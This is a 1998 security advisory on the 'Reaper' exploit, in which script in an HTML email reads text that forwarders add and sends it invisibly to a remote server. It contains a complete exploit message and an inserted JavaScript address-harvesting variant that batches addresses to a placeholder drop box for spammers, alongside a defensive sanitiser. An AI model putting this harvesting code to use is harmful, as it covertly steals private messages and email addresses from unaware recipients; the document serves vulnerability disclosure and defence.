Reaper Exploit


Last update: November 29, 1998, by C. Voth <rxd 'at' bigfoot 'dot' com>

ABSTRACT

Discovered October 5, 1998 by Carl Voth, this exploit uses features of Microsoft Dynamic HTML (DHTML) to surreptitiously intercept text that recipients add to an email message before forwarding it on to others. It assumes only that the original exploit message will eventually be forwarded to someone who reads it in an HTML-enabled, script-capable mail client.

AFFECTED APPLICATIONS

The exploit takes advantage of DHTML functionality in Internet Explorer 4.0, which Outlook 98 uses to render HTML mail. Outlook Express has not been tested but is presumed to be equally vulnerable, as is any other email client that uses Internet Explorer as its HTML engine (e.g. Eudora?). The JavaScript content is easily coded to survive forwarding through other HTML-based email clients even where they do not support the features in question. It is important to note, therefore, that a user of Netscape Mail (for example) is also indirectly vulnerable: if he forwards such a message, directly or indirectly, to a user of an Internet Explorer based client, his additions are exposed.

DESCRIPTION

The Microsoft implementation of DHTML adds a member to the document object, document.body.innerText, which returns the entire text content of the BODY element. The members innerHTML, outerText, and outerHTML can be used to similar effect. Normally these members only let a content author read back content he provided himself. In an email message, however, the BODY element contains not just the original message but also whatever the recipient has added or modified in preparation for forwarding it to others, and the JavaScript content is retained when the message is forwarded. Each time a subsequent recipient opens the forwarded message, the script runs again and harvests whatever the forwarder added. Because the script executes inline while the message is being parsed, it sees only the content that precedes it; the forwarding header and comments that a mail client inserts above the original content are therefore exactly what is captured.

To complete the exploit, the harvested content must be sent to the attacker without the knowledge of the recipients. Richard M. Smith (rms 'at' pharlap 'dot' com) recently posted an explanation of how this is done using the GET method of data submission: the script assigns a URL on the attacker's server, with the harvested text in the query string, to the src of an Image object, and the mail client fetches it as an ordinary HTTP GET request with nothing visible to the user. For this to work, the recipient must be connected to the Internet when opening the message and must be able to reach a server-side script on a web server of the attacker's choosing. If this is not the case, the attacker may still achieve his goal when the recipient forwards the message to someone else who does read mail online.

Sample code is provided at the end of this document.

APPLICATION #1 - Eavesdropping

Person A believes that if he sends a particular message to person B, B will modify or add to the content and then forward the edited message to person C without A's knowledge. With the aid of this exploit, A can learn what was sent to C without the knowledge of either B or C.

APPLICATION #2 - Spammer's Mailing List

Email virus hoaxes and chain letters that naive users forward indiscriminately are common on the Internet today. Separately, "spammers" scan newsgroups and other sources to collect email addresses for their mailing lists, and are fought to some degree by the use of fake email addresses in newsgroup postings. With this exploit, a spammer can craft a hoax or chain letter that harvests "known good" email addresses: the script is easily modified to extract only the addresses, which commonly appear in the forwarding information that the mail client inserts above the original content. Given the unfortunate extent to which such messages are forwarded, the spammer is likely to net a large list. Aside from the rare typo, every address on it is confirmed good rather than fake, and the list includes people who never post to the scannable newsgroups.
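The following is an added example, not code from the original advisory: the address-harvesting variant of the payload described above, in the form the script inside the message would take. The forwarded-message text is constructed for the example, the drop-box URL reuses the advisory's placeholder host, encodeURIComponent stands in for the 1998 escape(), and the batching keeps each request under Internet Explorer's URL limit of 2,083 characters so that a long harvest is not lost to a rejected request.

```javascript
// Added example, not code from the original advisory: the address-harvesting
// variant of the Reaper payload described under APPLICATION #2.

// Constructed sample of what document.body.innerText returns when a forwarded
// message is opened: the forwarder's note, the forwarding header the mail
// client inserted, and a quoted earlier forward, all above the original text.
const SAMPLE_BODY = [
  "FYI - thought you should see this.",
  "",
  "-----Original Message-----",
  "From: Bob Example <bob@example.org>",
  "Sent: Monday, October 05, 1998 9:12 AM",
  "To: alice@example.com; carol@example.net",
  "Cc: Dave <dave@example.org>",
  "Subject: FW: The sky is falling!",
  "",
  "> -----Original Message-----",
  "> From: eve@example.com",
  "> To: bob@example.org",
  "",
  "All text up to and including this paragraph will be harvested."
].join("\n");

// Hypothetical drop box (same placeholder host as the advisory's sample).
const DROPBOX = "http://any-site.web/cgi-bin/harvester.pl?";

// Internet Explorer refuses URLs longer than 2,083 characters, so a harvester
// that sends the whole body in one request risks losing everything; sending
// only addresses, in batches that fit, is what makes the spammer's variant work.
const MAX_URL_LENGTH = 2083;

// Loose mailbox pattern: enough to pull addresses out of forwarding headers,
// not an RFC 822 validator.
const ADDRESS_RE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/g;

// Distinct addresses in order of first appearance, lower-cased so that
// "Bob@Example.org" and "bob@example.org" count once.
function harvestAddresses(text) {
  const seen = new Set();
  const found = [];
  for (const match of text.match(ADDRESS_RE) || []) {
    const addr = match.toLowerCase();
    if (!seen.has(addr)) {
      seen.add(addr);
      found.push(addr);
    }
  }
  return found;
}

// Split the address list into as many GET URLs as needed so that no single
// request exceeds maxLen. An address that cannot fit even on its own is
// still sent alone rather than silently dropped.
function buildDropboxUrls(dropbox, addresses, maxLen) {
  const urlFor = (batch) => dropbox + "addrs=" + encodeURIComponent(batch.join(","));
  const urls = [];
  let batch = [];
  for (const addr of addresses) {
    if (batch.length > 0 && urlFor(batch.concat(addr)).length > maxLen) {
      urls.push(urlFor(batch));
      batch = [];
    }
    batch.push(addr);
  }
  if (batch.length > 0) urls.push(urlFor(batch));
  return urls;
}

// Inside the message the script would run the pipeline against the live
// document and fire one invisible image request per URL, exactly as the
// advisory's sample does with its single "payload=" request:
//
//   buildDropboxUrls(DROPBOX, harvestAddresses(document.body.innerText), MAX_URL_LENGTH)
//     .forEach(function (url) { new Image().src = url; });
//
// Offline, the same pipeline over the constructed text:
function demo() {
  const addresses = harvestAddresses(SAMPLE_BODY);
  return { addresses: addresses, urls: buildDropboxUrls(DROPBOX, addresses, MAX_URL_LENGTH) };
}
```

Run offline, demo() yields five distinct addresses from the constructed header block (the duplicate bob@example.org is collapsed) in a single request; lowering the limit to 80 characters in buildDropboxUrls splits the same list into five requests, one address each.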

CONCLUSIONS

There are three fundamental reasons why this exploit is possible:

  1. The attacker's executable content survives the forwarding process without the knowledge of the victims. This could be viewed as analogous to a script in one browser frame written by one author being able to access the frame content belonging to another author.
  2. The BODY element content is readable by the script and all subsequent forwarding edits are performed within the same element.
  3. Data submission to remote servers using the GET method is possible without the knowledge of the victim.

It is left to the experts to discern how these facts violate the security model for JavaScript. One way or another, a fix is certainly needed, since the vulnerability of even the most security-conscious user is a function of the vulnerability of other users' client configurations.

It is important to realize that although other HTML-capable clients may not be directly vulnerable to this exploit, they are certainly indirectly vulnerable and contribute to the problem if they are designed to forward executable content. This is true of the Mail component of Netscape Communicator 4 and is most likely true of others as well.

Microsoft was informed of this exploit November 2, 1998 and responded November 18, 1998. Outlook and Outlook Express development teams conceded there is an issue, but Microsoft claims a tradeoff is necessary between their customers' desire for scripting in email and "the need to mitigate security risks". Their solution is to suggest that the customer can choose to prevent such attacks by turning off email scripting. Future Microsoft products will warn users when scripted content is present.

As stated earlier, since one user's vulnerability is a function of another user's client configuration, Microsoft's solution is not sufficient.
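As an added illustration, not code from the advisory or from any mail client, here is the check a forwarding client or mail gateway could apply to close the first of the three holes listed above: strip the executable content before the message is forwarded, so that nothing travels on with the forwarder's additions, whatever the next recipient's client settings are. The input message is a constructed imitation of the Reaper sample with two further script carriers added (an event-handler attribute and a javascript: link). It is written as a small tag scanner rather than regular expressions over the whole document, because a script element's body has to be removed as a unit; a real client should drive the same rules from its own HTML parser, or forward as plain text.

```javascript
// Added example, not code from the original advisory: neutralising a
// forwarded HTML message by removing its executable content before it
// travels on, i.e. closing hole 1 of the three listed in the CONCLUSIONS.

// Constructed message in the shape of the Reaper sample, with two further
// carriers of script that a forwarder would also want removed.
const CONSTRUCTED_MESSAGE = [
  "<HTML>",
  "<!-- comment that would also survive forwarding -->",
  "<HEAD><TITLE>Reaper Exploit</TITLE></HEAD>",
  '<BODY onLoad="alert(1)">',
  "<P>FW: read this and pass it on.</P>",
  "<SCRIPT>",
  "<!--",
  "var harvest = new Image();",
  'harvest.src = "http://any-site.web/cgi-bin/harvester.pl?payload=" + escape(document.body.innerText);',
  "// -->",
  "</SCRIPT>",
  '<P>The sky is falling! <A HREF="JavaScript:alert(2)">Forward this</A> to your friends.</P>',
  "</BODY>",
  "</HTML>"
].join("\n");

// Attribute patterns applied to the inside of one tag. Values may be
// double-quoted, single-quoted or bare.
const HANDLER_RE = /\s+on[a-z0-9_-]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi;
const URL_ATTR_RE = /\s+(href|src|action)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi;

// Remove event handlers and script-scheme URLs ("BODY onLoad=..." -> "BODY").
// Whitespace and control characters inside the URL are ignored when checking
// the scheme, since browsers ignore them too.
function scrubAttributes(tagBody) {
  return tagBody
    .replace(HANDLER_RE, "")
    .replace(URL_ATTR_RE, (whole, attr, raw) => {
      const scheme = raw.replace(/^["']|["']$/g, "").replace(/[\s\x00-\x1f]/g, "").toLowerCase();
      return /^(javascript|vbscript):/.test(scheme) ? "" : whole;
    });
}

// Walk the document once. Script elements are dropped together with their
// whole body, comments are dropped because they carry nothing the forwarder
// needs, and every other tag is kept with its attributes scrubbed. Text
// between tags passes through untouched.
function stripActiveContent(html) {
  let out = "";
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt < 0) {                       // no more tags: copy the trailing text
      out += html.slice(i);
      break;
    }
    out += html.slice(i, lt);
    if (html.startsWith("<!--", lt)) {  // comment: skip to its end
      const end = html.indexOf("-->", lt + 4);
      i = end < 0 ? html.length : end + 3;
      continue;
    }
    const gt = html.indexOf(">", lt);
    if (gt < 0) break;                  // unterminated tag: drop the remainder
    const tagBody = html.slice(lt + 1, gt);
    const nameMatch = /^\/?\s*([A-Za-z][A-Za-z0-9]*)/.exec(tagBody);
    const name = nameMatch ? nameMatch[1].toLowerCase() : "";
    if (name === "script") {
      if (tagBody.startsWith("/")) {    // stray closing tag: just drop it
        i = gt + 1;
        continue;
      }
      const close = /<\/script\s*>/i.exec(html.slice(gt + 1));
      i = close ? gt + 1 + close.index + close[0].length : html.length;
      continue;
    }
    out += "<" + scrubAttributes(tagBody) + ">";
    i = gt + 1;
  }
  return out;
}

// What a forwarding client would send on in place of the received message.
function sanitisedForward() {
  return stripActiveContent(CONSTRUCTED_MESSAGE);
}
```

On the constructed message the output keeps both paragraphs and the link text, while the SCRIPT element, the onLoad handler, the javascript: HREF and the comments are gone. The limits are the usual ones for hand-rolled HTML handling: a ">" inside a quoted attribute value ends the tag early, and nothing here covers IE-specific carriers outside the script/handler/URL trio, which is why the parser-backed or plain-text route is preferable in a shipping client.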

SAMPLE SCRIPT

What follows is a sample exploit message. Varied server-side script solutions are possible; none is provided here.

Note that version checking keeps the script benign unless Internet Explorer 4 or later is detected. Testing other versions may show that this can be broadened.

--Start of Reaper Exploit Sample Message-------------------------------
<HTML>
<!-- Reaper Exploit - (c) 1998 Carl Voth. All rights reserved. -->
<HEAD><TITLE>Reaper Exploit</TITLE></HEAD>
<BODY>
<P>All text up to and including this paragraph will be harvested and
delivered upon opening the scripted version of this message.</P>
<SCRIPT>
<!--
// Reaper will scan text preceding this script and submit it to a waiting
// server-side script. Because the script runs inline while the message is
// being parsed, document.body.innerText holds only the content above it,
// which is where mail clients insert forwarding headers and comments.
var dropbox = "http://any-site.web/cgi-bin/harvester.pl?";

// Is function derived from code sample acquired from
// http://developer.netscape.com/docs/examples/
function Is ()
  {
  var agt=navigator.userAgent.toLowerCase();
  this.major = parseInt(navigator.appVersion);
  this.minor = parseFloat(navigator.appVersion);
  this.ie = (agt.indexOf("msie") != -1);
  this.ie3 = (this.ie && (this.major == 2));  // IE3 reports appVersion 2.0; unused below
  this.ie4 = (this.ie && (this.major == 4));
  this.ie4up = this.ie  && (this.major >= 4);
  }

var is;
var isIE3Mac = false;
if ((navigator.appVersion.indexOf("Mac")!=-1) &&
    (navigator.userAgent.indexOf("MSIE")!=-1) &&
    (parseInt(navigator.appVersion)==3))
  isIE3Mac = true;
else 
  is = new Is(); 
if (!isIE3Mac && is.ie4up)  // IE4 or later
  {
  var payload;
  payload = document.body.innerText;   // everything rendered so far
  if (payload && navigator.onLine)
    {
    // The Image is never added to the document, so the fetch of the drop
    // box URL is an invisible HTTP GET with the harvest in the query string.
    var harvest = new Image();
    harvest.src = dropbox + "payload=" + escape(payload);
    }
  }
else
  {
  // Any other client vulnerable to variant of this exploit?
  }
// -->
</SCRIPT>
<!-- Reaper does not harvest the text which follows. -->
<P>The sky is falling! Forward this to your friends.</P>
</BODY>
</HTML>
--End of Reaper Exploit Sample Message---------------------------------

Copyright 1998 Carl Voth. All rights reserved.
